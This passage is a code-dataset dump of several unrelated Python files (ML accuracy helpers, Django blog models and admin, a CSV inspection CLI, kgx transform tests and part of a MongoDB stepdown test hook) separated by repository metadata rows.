def yaml_dir_to_csv(dir, path):
df = yaml_dir_to_df(dir)
df.to_csv(path)
return
def multiclass_accuracy(outputs, labels):
_, predicted = torch.max(outputs.data, 1)
total = labels.size(0)
correct = (predicted == labels).sum().float()
return correct / total
def binary_accuracy(preds, y):
rounded_preds = torch.round(torch.sigmoid(preds))
correct = (rounded_preds == y).float()
acc = correct.sum() / len(correct)
return acc
def epoch_time(start_time, end_time):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
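# Illustrative usage sketch (an addition, not part of the original module): how
# the flag helpers above are typically wired into an absl entry point. The flag
# names and defaults below are hypothetical, so the example is left commented out.
#
# from absl import app
#
# DEFAULT_FLAGS = {"learning_rate": 0.01, "epochs": 10, "log_dir": "/tmp/run"}
# build_flags(DEFAULT_FLAGS)
#
# def main(_):
#     config = flags_to_dict(DEFAULT_FLAGS)
#     save_yaml(os.path.join(config["log_dir"], "config.yaml"), config)
#
# if __name__ == "__main__":
#     app.run(main)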
| 26.212389
| 84
| 0.613606
|
44016c7d6de76195a2afd8a37d9fd6f464a79e09
| 2,536
|
py
|
Python
|
blog/migrations/0001_initial.py
|
deejay001/Deejay-Tech-site
|
c454c45eadc0662bef2e806984ab7fa85aeae4e7
|
[
"Apache-2.0"
] | null | null | null |
blog/migrations/0001_initial.py
|
deejay001/Deejay-Tech-site
|
c454c45eadc0662bef2e806984ab7fa85aeae4e7
|
[
"Apache-2.0"
] | null | null | null |
blog/migrations/0001_initial.py
|
deejay001/Deejay-Tech-site
|
c454c45eadc0662bef2e806984ab7fa85aeae4e7
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.0.8 on 2020-08-19 14:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30, unique=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('updated_on', models.DateTimeField(auto_now=True)),
],
options={
'ordering': ['-created_on'],
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30, unique=True)),
('slug', models.SlugField(max_length=30, unique=True)),
('content', models.TextField()),
('image', models.ImageField(upload_to='media')),
('updated_on', models.DateTimeField(auto_now=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('status', models.IntegerField(choices=[(0, 'Draft'), (1, 'Publish')])),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_posts', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-created_on'],
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('email', models.EmailField(max_length=254)),
('body', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=False)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.Post')),
],
options={
'ordering': ['-created_on'],
},
),
]
| 40.903226
| 147
| 0.558754
|
8ede36227847590fe8c301158dac36ee1c5368a8
| 2,726
|
py
|
Python
|
DjangoBlog/admin_site.py
|
lixiaofeng1993/DjangoBlog
|
94d062324367b8a30edf8d29e2e661c822bcb7c1
|
[
"MIT"
] | null | null | null |
DjangoBlog/admin_site.py
|
lixiaofeng1993/DjangoBlog
|
94d062324367b8a30edf8d29e2e661c822bcb7c1
|
[
"MIT"
] | 6
|
2020-06-06T00:44:08.000Z
|
2022-01-13T01:52:46.000Z
|
DjangoBlog/admin_site.py
|
lixiaofeng1993/DjangoBlog
|
94d062324367b8a30edf8d29e2e661c822bcb7c1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
"""
@version: ??
@author: liangliangyy
@license: MIT Licence
@contact: liangliangyy@gmail.com
@site: https://www.lylinux.net/
@software: PyCharm
@file: admin_site.py
@time: 2018/1/7 上午2:21
"""
from django.contrib.admin import AdminSite
from DjangoBlog.utils import get_current_site
from django.contrib.sites.admin import SiteAdmin
from django.contrib.admin.models import LogEntry
from django.contrib.sites.models import Site
from DjangoBlog.logentryadmin import LogEntryAdmin
# from djcelery.models import PeriodicTask, CrontabSchedule, IntervalSchedule, PeriodicTasks, WorkerState
from blog.admin import *
from accounts.admin import *
from oauth.admin import *
from servermanager.admin import *
from comments.admin import *
from owntracks.admin import *
from base.admin import *
from guest.admin import *
class DjangoBlogAdminSite(AdminSite):
site_header = '博客管理后台'
site_title = '博客管理后台管理员'
def __init__(self, name='admin'):
super().__init__(name)
def has_permission(self, request):
return request.user.is_superuser
# def get_urls(self):
# urls = super().get_urls()
# from django.urls import path
# from blog.views import refresh_memcache
#
# my_urls = [
# path('refresh/', self.admin_view(refresh_memcache), name="refresh"),
# ]
# return urls + my_urls
admin_site = DjangoBlogAdminSite(name='admin')
admin_site.register(Article, ArticlelAdmin)
admin_site.register(Category, CategoryAdmin)
admin_site.register(Tag, TagAdmin)
admin_site.register(Links, LinksAdmin)
admin_site.register(SideBar, SideBarAdmin)
admin_site.register(BlogSettings, BlogSettingsAdmin)
admin_site.register(commands, CommandsAdmin)
admin_site.register(EmailSendLog, EmailSendLogAdmin)
admin_site.register(BlogUser, BlogUserAdmin)
admin_site.register(Comment, CommentAdmin)
admin_site.register(OAuthUser, OAuthUserAdmin)
admin_site.register(OAuthConfig, OAuthConfigAdmin)
admin_site.register(OwnTrackLog, OwnTrackLogsAdmin)
admin_site.register(Site, SiteAdmin)
admin_site.register(LogEntry, LogEntryAdmin)
admin_site.register(Project, ProjectAdmin)
admin_site.register(Environment, EnvAdmin)
admin_site.register(Interface, InterfaceAdmin)
admin_site.register(Case, CaseAdmin)
admin_site.register(Plan, PlanAdmin)
admin_site.register(Report, ReportAdmin)
admin_site.register(Sign, SignAdmin)
admin_site.register(Event, EventAdmin)
admin_site.register(Guest, GuestAdmin)
# admin_site.register(PeriodicTask)
# admin_site.register(CrontabSchedule)
# admin_site.register(IntervalSchedule)
# admin_site.register(PeriodicTasks)
# admin_site.register(WorkerState)
| 29
| 105
| 0.771093
|
0471659deb1002875ec4f0faf524cab1b2e40136
| 370
|
py
|
Python
|
ir_axioms/model/__init__.py
|
webis-de/ir_axioms
|
9c1b3ed4e47c6c4f3405ebd49fff0ceeb431a753
|
[
"MIT"
] | 11
|
2022-02-20T12:10:12.000Z
|
2022-03-11T15:45:19.000Z
|
ir_axioms/model/__init__.py
|
heinrichreimer/ir_axioms
|
f7349c4adde96cfa19c7247824a70a4662c07582
|
[
"MIT"
] | 3
|
2022-02-28T15:47:29.000Z
|
2022-03-02T09:14:59.000Z
|
ir_axioms/model/__init__.py
|
heinrichreimer/ir_axioms
|
f7349c4adde96cfa19c7247824a70a4662c07582
|
[
"MIT"
] | 1
|
2022-02-20T15:42:42.000Z
|
2022-02-20T15:42:42.000Z
|
from ir_axioms.model import base, context
# Re-export the public model classes from the sub-modules.
Query = base.Query
Document = base.Document
TextDocument = base.TextDocument
RankedDocument = base.RankedDocument
RankedTextDocument = base.RankedTextDocument
JudgedRankedDocument = base.JudgedRankedDocument
JudgedRankedTextDocument = base.JudgedRankedTextDocument
IndexContext = context.IndexContext
| 28.461538
| 56
| 0.848649
|
1e9df13b3894d87ccfb800e350360daf8d5903eb
| 6,129
|
py
|
Python
|
csvchk.py
|
kyclark/csvchk
|
fee2b14adf6e94b05e8e00f9b1eeb44d19e5fb71
|
[
"MIT"
] | null | null | null |
csvchk.py
|
kyclark/csvchk
|
fee2b14adf6e94b05e8e00f9b1eeb44d19e5fb71
|
[
"MIT"
] | null | null | null |
csvchk.py
|
kyclark/csvchk
|
fee2b14adf6e94b05e8e00f9b1eeb44d19e5fb71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Purpose: Check the first/few records of a delimited text file
Author : Ken Youens-Clark <kyclark@gmail.com>
"""
import argparse
import csv
import os
import pyparsing as pp
import re
import sys
from typing import List, TextIO, NamedTuple, Any, Dict
VERSION = '0.1.8'
class Args(NamedTuple):
file: List[TextIO]
sep: str
fieldnames: str
limit: int
grep: str
dense_view: bool
show_field_number: bool
no_headers: bool
# --------------------------------------------------
def get_args() -> Args:
"""Get command-line arguments"""
parser = argparse.ArgumentParser(
description='Check a delimited text file',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('file',
metavar='FILE',
type=str,
nargs='+',
help='Input file(s)')
parser.add_argument('-s',
'--sep',
help='Field separator',
metavar='sep',
type=str,
default='')
parser.add_argument('-f',
'--fieldnames',
help='Field names (no header)',
metavar='names',
type=str,
default='')
parser.add_argument('-l',
'--limit',
help='How many records to show',
metavar='nrecs',
type=int,
default=1)
parser.add_argument('-g',
'--grep',
help='Only show records with a given value',
metavar='grep',
type=str,
default='')
parser.add_argument('-d',
'--dense',
help='Not sparse (skip empty fields)',
action='store_true')
parser.add_argument('-n',
'--number',
help='Show field number (e.g., for awk)',
action='store_true')
parser.add_argument('-N',
'--noheaders',
help='No headers in first row',
action='store_true')
parser.add_argument('-e',
'--encoding',
help='File encoding',
metavar='encode',
type=str,
choices=['utf-8', 'utf-8-sig', 'ISO-8859-1'],
default='utf-8')
parser.add_argument('--version',
action='version',
version=f'%(prog)s {VERSION}')
args = parser.parse_args()
for filename in args.file:
if filename != '-' and not os.path.isfile(filename):
parser.error(f"No such file or directory: '{filename}'")
open_args = {'encoding': args.encoding, 'errors': 'ignore'}
args.file = list(
map(lambda f: sys.stdin
if f == '-' else open(f, **open_args), args.file))
if len(args.sep) > 1:
parser.error(f'--sep "{args.sep}" must be a 1-character string')
return Args(file=args.file,
sep=args.sep,
fieldnames=args.fieldnames,
limit=args.limit,
grep=args.grep,
dense_view=args.dense,
show_field_number=args.number,
no_headers=args.noheaders)
# --------------------------------------------------
def main() -> None:
""" Make a jazz noise here """
args = get_args()
grep = args.grep
for i, fh in enumerate(args.file):
if len(args.file) > 1:
print('{}==> {} <=='.format('\n' if i > 0 else '',
os.path.basename(fh.name)))
sep = guess_sep(args.sep, fh.name)
csv_args: Dict[str, Any] = {'delimiter': sep}
if args.fieldnames:
names = re.split(r'\s*,\s*', args.fieldnames)
if names:
csv_args['fieldnames'] = names
if args.no_headers:
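            # No header row: read the first data line to count fields (pyparsing
            # copes with quoted separators), then synthesize Field1..FieldN names.
            # The file is rewound afterwards unless it is stdin.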
line = fh.readline()
num_flds = len(pp.commaSeparatedList.parseString(line).asList())
csv_args['fieldnames'] = list(
map(lambda i: f'Field{i}', range(1, num_flds + 1)))
if fh.name != '<stdin>':
fh.seek(0)
reader = csv.DictReader(fh, **csv_args)
num_shown = 0
for row in reader:
vals = dict([x for x in row.items()
if x[1] != '']) if args.dense_view else row
if grep and not any([grep in x for x in vals.values()]):
continue
flds = vals.keys()
longest = max(map(len, flds))
fmt = '{:' + str(longest + 1) + '}: {}'
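            # e.g. longest == 6 gives '{:7}: {}', padding each key to a common
            # width so every colon lands in the same column.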
num_shown += 1
print(f'// ****** Record {num_shown} ****** //')
for n, (key, val) in enumerate(vals.items(), start=1):
show = fmt.format(key, val)
if args.show_field_number:
print('{:3} {}'.format(n, show))
else:
print(show)
if num_shown == args.limit:
break
# --------------------------------------------------
def guess_sep(sep: str, filename: str) -> str:
""" If no separator, guess from file extension """
if not sep:
_, ext = os.path.splitext(filename)
if ext == '.csv':
sep = ','
else:
sep = '\t'
return sep
# --------------------------------------------------
def test_guess_sep() -> None:
""" Test guess_sep() """
assert guess_sep(',', 'foo.csv') == ','
assert guess_sep('', 'foo.csv') == ','
assert guess_sep('\t', 'foo.csv') == '\t'
assert guess_sep('', 'foo.tab') == '\t'
assert guess_sep('', 'foo.txt') == '\t'
# --------------------------------------------------
if __name__ == '__main__':
main()
| 30.044118
| 76
| 0.441344
|
95bbc26cc394befb98b7d7edad885cc2907b0856
| 1,456
|
py
|
Python
|
{{cookiecutter.project_slug}}/backend/app/app/rest_tests/api/api_v1/token/test_token.py
|
senseta-os/base-project
|
2cc977b828ac2204cb9fd014abd7c6ff0ff148d6
|
[
"MIT"
] | 54
|
2017-12-01T17:28:43.000Z
|
2022-03-08T11:12:54.000Z
|
{{cookiecutter.project_slug}}/backend/app/app/rest_tests/api/api_v1/token/test_token.py
|
senseta-os/base-project
|
2cc977b828ac2204cb9fd014abd7c6ff0ff148d6
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/backend/app/app/rest_tests/api/api_v1/token/test_token.py
|
senseta-os/base-project
|
2cc977b828ac2204cb9fd014abd7c6ff0ff148d6
|
[
"MIT"
] | 9
|
2017-12-07T13:50:37.000Z
|
2021-07-11T02:49:47.000Z
|
# Import installed packages
import requests
# Import app code
from app.core import config
def test_get_access_token(server_api):
login_data = {
'username': config.FIRST_SUPERUSER,
'password': config.FIRST_SUPERUSER_PASSWORD
}
r = requests.post(
f'{server_api}{config.API_V1_STR}/login/access-token', data=login_data)
tokens = r.json()
assert r.status_code == 200
assert 'access_token' in tokens
assert 'refresh_token' in tokens
assert tokens['access_token']
assert tokens['refresh_token']
def test_use_access_token(server_api, superuser_token_headers):
r = requests.post(
f'{server_api}{config.API_V1_STR}/login/test-token',
headers=superuser_token_headers,
json={'test': 'test'})
result = r.json()
assert r.status_code == 200
assert 'id' in result
def test_refresh_token(server_api):
login_data = {
'username': config.FIRST_SUPERUSER,
'password': config.FIRST_SUPERUSER_PASSWORD
}
r = requests.post(
f'{server_api}{config.API_V1_STR}/login/access-token', data=login_data)
tokens = r.json()
refresh_token = tokens['refresh_token']
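    # Present the refresh token as a Bearer credential to mint a new access token.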
headers = {
'Authorization': f'Bearer {refresh_token}'
}
r = requests.post(
f'{server_api}{config.API_V1_STR}/login/refresh-token',
headers=headers)
result = r.json()
assert r.status_code == 200
assert 'access_token' in result
| 29.12
| 79
| 0.67239
|
39927ce8584ea654a72016b6c59ba8738a38b2fa
| 16,851
|
py
|
Python
|
tests/integration/test_stream_transform.py
|
STARInformatics/kgx
|
a4b4dd73f866486466c03579f62e0c527ef1af1e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/test_stream_transform.py
|
STARInformatics/kgx
|
a4b4dd73f866486466c03579f62e0c527ef1af1e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/test_stream_transform.py
|
STARInformatics/kgx
|
a4b4dd73f866486466c03579f62e0c527ef1af1e
|
[
"BSD-3-Clause"
] | null | null | null |
import copy
import os
import pytest
from kgx.transformer import Transformer
from tests import TARGET_DIR, RESOURCE_DIR, print_graph
from tests.integration import (
clean_slate,
DEFAULT_NEO4J_URL,
DEFAULT_NEO4J_USERNAME,
DEFAULT_NEO4J_PASSWORD,
)
def run_transform(query):
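    # query is a tuple: (input args, output args, expected node count, expected edge count).
    # Deep copies keep the two transform runs from mutating each other's arguments.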
_transform(copy.deepcopy(query))
_stream_transform(copy.deepcopy(query))
def _transform(query):
"""
Transform an input to an output via Transformer.
"""
t1 = Transformer()
t1.transform(query[0])
t1.save(query[1].copy())
assert t1.store.graph.number_of_nodes() == query[2]
assert t1.store.graph.number_of_edges() == query[3]
output = query[1]
if output['format'] in {'tsv', 'csv', 'jsonl'}:
input_args = {
'filename': [
f"{output['filename']}_nodes.{output['format']}",
f"{output['filename']}_edges.{output['format']}",
],
'format': output['format'],
}
elif output['format'] in {'neo4j'}:
input_args = {
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
}
else:
input_args = {'filename': [f"{output['filename']}"], 'format': output['format']}
t2 = Transformer()
t2.transform(input_args)
assert t2.store.graph.number_of_nodes() == query[2]
assert t2.store.graph.number_of_edges() == query[3]
def _stream_transform(query):
"""
Transform an input to an output via Transformer where streaming is enabled.
"""
t1 = Transformer(stream=True)
t1.transform(query[0], query[1])
output = query[1]
if output['format'] in {'tsv', 'csv', 'jsonl'}:
input_args = {
'filename': [
f"{output['filename']}_nodes.{output['format']}",
f"{output['filename']}_edges.{output['format']}",
],
'format': output['format'],
}
elif output['format'] in {'neo4j'}:
input_args = {
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
}
else:
input_args = {'filename': [f"{output['filename']}"], 'format': output['format']}
t2 = Transformer()
t2.transform(input_args)
assert t2.store.graph.number_of_nodes() == query[2]
assert t2.store.graph.number_of_edges() == query[3]
@pytest.mark.parametrize(
'query',
[
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
},
{'filename': os.path.join(TARGET_DIR, 'graph1.json'), 'format': 'json'},
512,
532,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
},
{'filename': os.path.join(TARGET_DIR, 'graph2'), 'format': 'jsonl'},
512,
532,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
'lineterminator': None,
},
{'filename': os.path.join(TARGET_DIR, 'graph3.nt'), 'format': 'nt'},
512,
532,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
'node_filters': {'category': {'biolink:Gene'}},
},
{'filename': os.path.join(TARGET_DIR, 'graph4'), 'format': 'jsonl'},
178,
178,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
'node_filters': {'category': {'biolink:Gene'}},
'edge_filters': {'predicate': {'biolink:interacts_with'}},
},
{'filename': os.path.join(TARGET_DIR, 'graph5'), 'format': 'jsonl'},
178,
165,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
'edge_filters': {
'subject_category': {'biolink:Disease'},
'object_category': {'biolink:PhenotypicFeature'},
'predicate': {'biolink:has_phenotype'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph6'), 'format': 'jsonl'},
133,
13,
),
],
)
def test_transform1(query):
"""
Test loading data from a TSV source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{'filename': [os.path.join(RESOURCE_DIR, 'graph.json')], 'format': 'json'},
{
'filename': os.path.join(TARGET_DIR, 'graph1s2'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'taxon'],
'edge_properties': ['subject', 'predicate', 'object', 'relation', 'provided_by'],
},
512,
532,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'graph.json')], 'format': 'json'},
{'filename': os.path.join(TARGET_DIR, 'graph2s2'), 'format': 'jsonl'},
512,
532,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'graph.json')], 'format': 'json'},
{'filename': os.path.join(TARGET_DIR, 'graph3s2.nt'), 'format': 'nt'},
512,
532,
),
(
{
'filename': [os.path.join(RESOURCE_DIR, 'graph.json')],
'format': 'json',
'edge_filters': {
'subject_category': {'biolink:Disease'},
'object_category': {'biolink:PhenotypicFeature'},
'predicate': {'biolink:has_phenotype'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph4s2'), 'format': 'jsonl'},
133,
13,
),
],
)
def test_transform2(query):
"""
Test loading data from JSON source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')], 'format': 'nt'},
{
'filename': os.path.join(TARGET_DIR, 'graph1s3'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'description', 'provided_by'],
'edge_properties': [
'subject',
'predicate',
'object',
'relation',
'category',
'fusion',
'homology',
'combined_score',
'cooccurrence',
],
},
7,
6,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')], 'format': 'nt'},
{'filename': os.path.join(TARGET_DIR, 'graph2s3.json'), 'format': 'json'},
7,
6,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')], 'format': 'nt'},
{'filename': os.path.join(TARGET_DIR, 'graph3s3'), 'format': 'jsonl'},
7,
6,
),
(
{
'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')],
'format': 'nt',
'edge_filters': {
'subject_category': {'biolink:Gene', 'biolink:Protein'},
'object_category': {'biolink:Gene', 'biolink:Protein'},
'predicate': {'biolink:has_gene_product', 'biolink:interacts_with'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph4s3'), 'format': 'jsonl'},
6,
3,
),
],
)
def test_transform3(query):
"""
Test loading data from RDF source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')], 'format': 'obojson'},
{
'filename': os.path.join(TARGET_DIR, 'graph1s4'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'description', 'provided_by'],
'edge_properties': ['subject', 'predicate', 'object', 'relation', 'category'],
},
176,
206,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')], 'format': 'obojson'},
{
'filename': os.path.join(TARGET_DIR, 'graph2s4'),
'format': 'jsonl',
},
176,
206,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')], 'format': 'obojson'},
{
'filename': os.path.join(TARGET_DIR, 'graph3s4.nt'),
'format': 'nt',
},
176,
206,
),
(
{
'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')],
'format': 'obojson',
'edge_filters': {
'subject_category': {'biolink:BiologicalProcess'},
'predicate': {'biolink:subclass_of'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph4s4'), 'format': 'jsonl'},
72,
73,
),
],
)
def test_transform4(query):
"""
Test loading data from RDF source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{
'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')],
'format': 'owl',
},
{
'filename': os.path.join(TARGET_DIR, 'graph1s5'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'description', 'provided_by'],
'edge_properties': ['subject', 'predicate', 'object', 'relation', 'category'],
},
220,
1050,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')], 'format': 'owl'},
{'filename': os.path.join(TARGET_DIR, 'graph2s5'), 'format': 'jsonl'},
220,
1050,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')], 'format': 'owl'},
{'filename': os.path.join(TARGET_DIR, 'graph3s5.nt'), 'format': 'nt'},
220,
1050,
),
# (
# {
# 'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')],
# 'format': 'owl',
# 'edge_filters': {
# 'subject_category': {'biolink:BiologicalProcess'},
# 'predicate': {'biolink:subclass_of'}
# }
# },
# {
# 'filename': os.path.join(TARGET_DIR, 'graph4s5'),
# 'format': 'jsonl'
# },
# 220,
# 1050
# )
],
)
def test_transform5(query):
"""
Test transforming data from an OWL source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'filename': os.path.join(TARGET_DIR, 'graph1s6'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'description', 'provided_by'],
'edge_properties': ['subject', 'predicate', 'object', 'relation', 'category'],
},
4,
3,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'filename': os.path.join(TARGET_DIR, 'graph2s6.json'),
'format': 'json',
},
4,
3,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'filename': os.path.join(TARGET_DIR, 'graph3s6'),
'format': 'jsonl',
},
4,
3,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'filename': os.path.join(TARGET_DIR, 'graph4s6.nt'),
'format': 'nt',
},
4,
3,
),
(
{
'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')],
'format': 'trapi-json',
'edge_filters': {
'subject_category': {'biolink:Disease'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph5s6'), 'format': 'jsonl'},
2,
0,
),
],
)
def test_transform6(query):
"""
Test transforming data from RDF source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.skip()
@pytest.mark.parametrize(
'query',
[
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
512,
532,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'graph.json')], 'format': 'json'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
512,
532,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')], 'format': 'nt'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
7,
6,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')], 'format': 'obojson'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
176,
206,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')], 'format': 'owl'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
220,
1050,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
4,
3,
),
],
)
def test_transform7(clean_slate, query):
"""
Test transforming data from various sources to a Neo4j sink.
"""
run_transform(query)
| 30.976103
| 99
| 0.449588
|
cfd7e5453a477bbb72a06928cc21ca6efa256267
| 213
|
py
|
Python
|
update_serve.py
|
ArtemFomenko/emlid-docs
|
3c764c2062d9a2fd1be11c1f6763ed308cdc8ce7
|
[
"BSD-2-Clause"
] | 58
|
2019-02-26T07:42:54.000Z
|
2021-11-10T13:36:51.000Z
|
update_serve.py
|
ArtemFomenko/emlid-docs
|
3c764c2062d9a2fd1be11c1f6763ed308cdc8ce7
|
[
"BSD-2-Clause"
] | 20
|
2019-02-28T14:42:32.000Z
|
2021-04-13T14:10:35.000Z
|
update_serve.py
|
ArtemFomenko/emlid-docs
|
3c764c2062d9a2fd1be11c1f6763ed308cdc8ce7
|
[
"BSD-2-Clause"
] | 54
|
2019-02-22T15:37:00.000Z
|
2021-11-24T22:12:07.000Z
|
from build import Builder
import sys, os
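# Illustrative invocation (hypothetical config path): python update_serve.py mkdocs.yml
# Renders all templates, then serves the site with the given MkDocs config file.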
if __name__ == "__main__":
renderer = Builder(sys.argv[1])
renderer.render_all_templates()
os.system("mkdocs serve -f" + sys.argv[1])
| 23.666667
| 50
| 0.610329
|
6645f18308769bc7730b010e43ccbfec19815270
| 18,979
|
py
|
Python
|
buildscripts/resmokelib/testing/hooks/stepdown.py
|
norttung/mongo
|
a5e78c5cac31b22983cf4fc546329a85c0927fe9
|
[
"Apache-2.0"
] | 1
|
2018-03-07T22:12:35.000Z
|
2018-03-07T22:12:35.000Z
|
buildscripts/resmokelib/testing/hooks/stepdown.py
|
norttung/mongo
|
a5e78c5cac31b22983cf4fc546329a85c0927fe9
|
[
"Apache-2.0"
] | null | null | null |
buildscripts/resmokelib/testing/hooks/stepdown.py
|
norttung/mongo
|
a5e78c5cac31b22983cf4fc546329a85c0927fe9
|
[
"Apache-2.0"
] | null | null | null |
"""Test hook that periodically makes the primary of a replica set step down."""
from __future__ import absolute_import
import collections
import os.path
import random
import threading
import time
import bson
import pymongo.errors
from buildscripts.resmokelib import errors
from buildscripts.resmokelib import utils
from buildscripts.resmokelib.testing.hooks import interface
from buildscripts.resmokelib.testing.fixtures import replicaset
from buildscripts.resmokelib.testing.fixtures import shardedcluster
class ContinuousStepdown(interface.Hook): # pylint: disable=too-many-instance-attributes
"""Regularly connect to replica sets and send a replSetStepDown command."""
DESCRIPTION = ("Continuous stepdown (steps down the primary of replica sets at regular"
" intervals)")
def __init__( # pylint: disable=too-many-arguments
self, hook_logger, fixture, config_stepdown=True, shard_stepdown=True,
stepdown_duration_secs=10, stepdown_interval_ms=8000, terminate=False, kill=False,
use_stepdown_permitted_file=False, use_stepping_down_file=False,
wait_for_mongos_retarget=False):
"""Initialize the ContinuousStepdown.
Args:
hook_logger: the logger instance for this hook.
fixture: the target fixture (a replica set or sharded cluster).
config_stepdown: whether to stepdown the CSRS.
